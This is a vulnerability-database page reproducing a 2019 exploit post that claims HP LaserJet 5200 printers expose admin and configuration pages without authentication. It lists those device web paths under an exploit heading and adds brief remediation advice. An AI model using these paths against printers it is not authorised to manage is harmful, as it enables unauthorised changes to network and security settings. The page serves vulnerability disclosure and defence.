Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HP LaserJet 5200 HP LaserJet 5200 Authentication Bypass

🗓️ 02 Apr 2019 00:00:00Reported by KingSkrupellosType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 47 Views

HP LaserJet 5200 Authentication Bypass vulnerability in HP LaserJet 5200 Printers 6.7.0.

Code
`############################################################################################  
  
# Exploit Title : HP LaserJet 5200 Printers 6.7.0.x Bypass Missing Authentication  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 31/03/2019  
# Vendor Homepage : hp.com  
# Software Information Link :   
support.hp.com/gb-en/drivers/selfservice/hp-laserjet-5200-printer-series/1137934  
# Software Version :   
Driver-Universal Print Driver for Managed Services => 6.7.0.23989   
Driver-Universal Print Driver => Version 6.1.0.20062 and 6.7.0.23989  
Printer Model Number => Q7545A  
HP ChaiServer => Version 1.0  
Driver-Universal Print Driver for Managed Services => Version   
Driver-USB => Version 7.0.0.29 and 08.290.2  
Printer Model => Q7545A  
Model Number => J7949E   
Firmware Version => V.33.19.FF - 20091124 08.090.3  
Software Universal Printer Driver => Version 1.8.6  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : High  
# Vulnerability Type : CWE-306 [ Missing Authentication for Critical Function ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
############################################################################################  
  
# Description about Software :  
***************************  
HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American  
  
computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.  
  
############################################################################################  
  
# Impact :  
***********  
The software does not perform any authentication for functionality that requires a provable user identity   
  
or consumes a significant amount of resources.  
  
The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the   
  
affected application and change configuration settings or gain administrative access.  
  
Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.  
  
Developing a fix would require understanding of the current application security model and implemented access controls.  
  
Three basic rules however can help you eliminate potential improper authorization issues:  
  
1) Identify all privileged assets within your application (web pages that display sensitive data,   
website sections that contain privileged/administrative functionality, etc.)  
  
2) Identify user roles within the application and their access permissions  
  
3) Always check if the user should have privileges to access the asset  
  
############################################################################################  
  
# Bypass Missing Authentication Exploit / Vulnerability :  
*************************************************  
/hp/device/this.LCDispatcher  
  
/hp/device/this.LCDispatcher?nav=hp.EmailServer  
  
/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1  
  
/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1  
  
/hp/device/this.LCDispatcher?nav=hp.Alerts  
  
/hp/device/this.LCDispatcher?nav=hp.AutoSend  
  
/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0  
  
/hp/device/this.LCDispatcher?nav=hp.OtherLinks  
  
/hp/device/this.LCDispatcher?nav=hp.Config  
  
/hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig  
  
/hp/jetdirect  
  
/config_pro.htm  
/tcpipv6.htm  
/tcpipv4.htm  
  
/tcp_param.htm  
/network_id.htm  
  
/tcp_summary.htm  
/index_info.htm  
  
/support_param.html  
/support.htm  
  
/tcp_diag.htm  
/configpage.htm  
  
/tcp_param.htm  
/network_id.htm  
  
############################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
############################################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Apr 2019 00:00Current
0.3Low risk
Vulners AI Score0.3
hp laserjetauthentication bypassvulnerabilityremote attackconfiguration settingsadministrative accesshttp requestmultiuser environmentaccess controls
47